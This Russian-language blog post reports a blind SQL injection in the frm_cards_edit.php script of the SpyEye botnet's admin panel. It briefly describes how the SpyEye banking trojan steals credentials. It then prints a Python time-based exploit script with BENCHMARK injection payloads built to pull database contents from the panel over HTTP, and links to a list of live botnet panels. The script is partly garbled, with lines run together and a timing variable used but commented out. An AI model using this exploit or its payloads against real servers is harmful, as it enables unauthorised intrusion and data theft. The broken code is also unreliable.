Слепая sql-инъекция обнаружена в Spy eye botnet. Эксплоит.

Слепая sql-инъекция (blind sql-injection)  обнаружена в файле frm_cards_edit.php админ-панели Spy eye botnet.

Тип уязвмимости : Blind SQL injection
Уязвимый скрипт : frm_cards_edit.php
Версии подверженные уязвимости: Все








Краткий обзор Spy Eye
Spy Eye - это троян с функционалом бэкдора и возможность создания ботнетов с управлением на центральном командно-контрольном сервере, который пытается похитить с зараженного компьютера информацию связанную с онлайновыми банковскими операциями и кредитными картами. Spy Eye на платной основе распространяется его автором в набора утилит для быстрой и легкой настройки и создания исполняемого файла непосредственно трояна, а также командно-контрольного сервера. В начале 2011 года Spy Eye вообрал в себя функционал семейства троянской программы под названием
Zeus. Последняя была продана автору Spy Eye.

В своей работе Spy Eye может использовать целый ряд техник и методов для получения банковских учетных данных пользователей. Часто применяется атака типа фишинг, представляющая собой подставу фальшивой веб-страницы входа в банковскую систему (которая обычно является копией оригинальной), с целью обмана пользователя и получения таким образом от него учетных данных, с последующей их пересылкой на командно-контрольный сервер.



Exploit Preview :
Example:

Spyeye_r0073r /dir/"version()"
"""
if len(argv)<=3: exit() else: print "[+]Started pwn..." host = argv[1] path = argv[2] sql = argv[3] port = 80 hash = "" full = [] for k in range(48,122): full.append(k) full.append(0) # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # This is the charset to try delay = 0.5 a=1 while a <= 32: for i in full: j = 0 if i == 0: exit('\n[+]Finished\n') # start = time() # start time for the delay conn = HTTPConnection(host,port) #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" } values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" } data = urllib.urlencode(values) print data conn.request("GET", path + "frm_cards_edit.php?" + data ) response = conn.getresponse() read = response.read() print read if response.status == 404: exit('[+]404') #404 now = time() if now - start > delay:
#has come true then the character is valid
stdout.write(chr(i))
stdout.flush()
hash += chr(i)
a += 1
break;
else: j += 1
print "i vale %s, y J vale %s" %(i,j)

============================================================
Список ботнетов можно найти здесь https://spyeyetracker.abuse.ch/monitor.php

Comments :

0 коммент. to “Слепая sql-инъекция обнаружена в Spy eye botnet. Эксплоит.”

Отправить комментарий